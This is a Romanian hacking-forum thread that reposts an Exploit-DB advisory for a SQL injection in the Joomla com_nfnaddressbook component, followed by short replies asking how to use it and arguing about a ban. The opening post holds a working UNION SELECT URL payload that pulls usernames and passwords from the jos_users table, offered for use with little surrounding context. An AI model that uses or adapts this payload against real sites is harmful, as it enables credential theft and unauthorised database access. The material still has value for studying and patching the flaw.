romanu Posted March 14, 2010 Report Posted March 14, 2010 # Title: Joomla com_nfnaddressbook Remote Sql Injection Vulnerability # EDB-ID: 11730 # CVE-ID: () # OSVDB-ID: () # Author: Snakespc # Published: 2010-03-14 # Verified: no # Download Exploit Code# Download N/Aview sourceprint?============================================================================== [»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] ########################################################################### ===[ Exploit ]=== [»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- [»]Author: DrEadFul<- ########################################################################### Quote
r00ter32 Posted April 14, 2010 Report Posted April 14, 2010 cum se foloseste ... adica cum se porneste mai exact.. install pt aia care nu prea stiu Quote
lamisto Posted April 14, 2010 Report Posted April 14, 2010 r00ter32 ai sa vezi ca ratati ca tine o sa-si ia ban Quote
Nytro Posted April 14, 2010 Report Posted April 14, 2010 r00ter32: Ti-am scos banul.Poate nici eu nu stiu cum se foloseste. Si nu am de ce sa ma rusinez, pot invata. Quote
